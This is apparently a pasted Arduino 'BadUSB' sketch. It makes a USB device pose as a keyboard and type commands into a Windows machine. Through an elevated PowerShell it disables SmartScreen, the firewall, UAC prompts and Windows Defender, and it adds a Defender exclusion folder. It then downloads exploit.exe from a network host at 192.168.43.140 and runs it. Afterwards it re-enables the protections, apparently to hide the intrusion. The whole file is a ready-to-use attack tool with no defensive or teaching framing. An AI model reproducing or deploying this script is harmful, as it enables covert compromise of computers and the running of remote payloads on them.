badusb
unknown
plain_text
a year ago
5.9 kB
5
Indexable
Never
#include <Keyboard.h>
void setup() {
Keyboard.begin();
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
// Open the Powershell as Administrator
Keyboard.println("powershell.exe -command start-process powershell -verb runAs"); //
delay(1000);
Keyboard.press(KEY_LEFT_ARROW);
Keyboard.release(KEY_LEFT_ARROW);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press('o');
Keyboard.releaseAll();
delay(1000);
// Disabling SmartScreen Filter
Keyboard.print("Set-ItemProperty -Path \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\" -Name \"SmartScreenEnabled\" -Type String -Value \"Off\"");
typeKey(KEY_RETURN);
delay(1000);
Keyboard.print("Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost\" -Name \"EnableWebContentEvaluation\" -Type DWord -Value 0");
typeKey(KEY_RETURN);
delay(1000);
// DIsabling Firewall
delay(1000);
Keyboard.print("Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False");
typeKey(KEY_RETURN);
//Disabling the UAC
delay(1500);
Keyboard.print("Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name ConsentPromptBehaviorAdmin -Value 0");
typeKey(KEY_RETURN);
delay(1000);
Keyboard.print("exit");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
//DESACTIVER WINDOWS DEFENDER
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
delay(1500);
Keyboard.println("windowsdefender://threat/"); // Ouvre windows defender
delay(1500);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.release(KEY_DOWN_ARROW);
delay(1000);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.release(KEY_DOWN_ARROW);
delay(1000);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.release(KEY_DOWN_ARROW);
delay(1000);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.release(KEY_DOWN_ARROW);
delay(1000);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.release(KEY_DOWN_ARROW);
delay(1000);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.release(KEY_DOWN_ARROW);
delay(1500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.press(32);
Keyboard.release(32);
delay(1000);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
Keyboard.releaseAll();
// Open the Powershell as Administrator
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
delay(1000);
Keyboard.println("powershell.exe -command start-process powershell -verb runAs"); //
delay(1000);
Keyboard.print("New-Item 'C:\\Program Files\\Dossier_test' -itemType Directory");
typeKey(KEY_RETURN);
delay(1000);
Keyboard.print("Add-MpPreference -ExclusionPath 'C:\\Program Files\\Dossier_test'");
typeKey(KEY_RETURN);
delay(1000);
Keyboard.print("Invoke-WebRequest -Uri 'http://192.168.43.140/exploit.exe' -OutFile 'C:\\Program Files\\Dossier_test\\exploit.exe'");
typeKey(KEY_RETURN);
delay(500);
Keyboard.print("cd 'C:\\Program Files\\Dossier_test\\';.\\exploit.exe");
typeKey(KEY_RETURN);
// ACTIVE SMARTSCREEN FILTER
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
delay(1000);
Keyboard.println("powershell.exe -command start-process powershell -verb runAs");
delay(10000);
Keyboard.print("Set-ItemProperty -Path \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\" -Name \"SmartScreenEnabled\" -Type String -Value \"On\"");
typeKey(KEY_RETURN);
delay(1000);
Keyboard.print("Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost\" -Name \"EnableWebContentEvaluation\" -Type DWord -Value 1");
typeKey(KEY_RETURN);
delay(1000);
// active Firewall
delay(1000);
Keyboard.print("Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True");
typeKey(KEY_RETURN);
//active the UAC
delay(1500);
Keyboard.print("Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name ConsentPromptBehaviorAdmin -Value 2");
typeKey(KEY_RETURN);
delay(1000);
Keyboard.print("exit");
typeKey(KEY_RETURN);
Keyboard.releaseAll();
/*////reactive windows defender
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
delay(1500);
Keyboard.println("windowsdefender://threat/"); // Ouvre windows defender
delay(1500);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.release(KEY_DOWN_ARROW);
delay(500);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.release(KEY_DOWN_ARROW);
delay(500);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.release(KEY_DOWN_ARROW);
delay(500);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.release(KEY_DOWN_ARROW);
delay(500);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.release(KEY_DOWN_ARROW);
delay(500);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.release(KEY_DOWN_ARROW
);
delay(500);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.release(KEY_DOWN_ARROW);
delay(1500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.press(KEY_LEFT_ARROW);
Keyboard.release(KEY_LEFT_ARROW);
delay(1500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);*/
Keyboard.releaseAll();
Keyboard.end();
}
void typeKey(int key) {
Keyboard.press(key);
delay(50);
Keyboard.release(key);
}
void loop() {}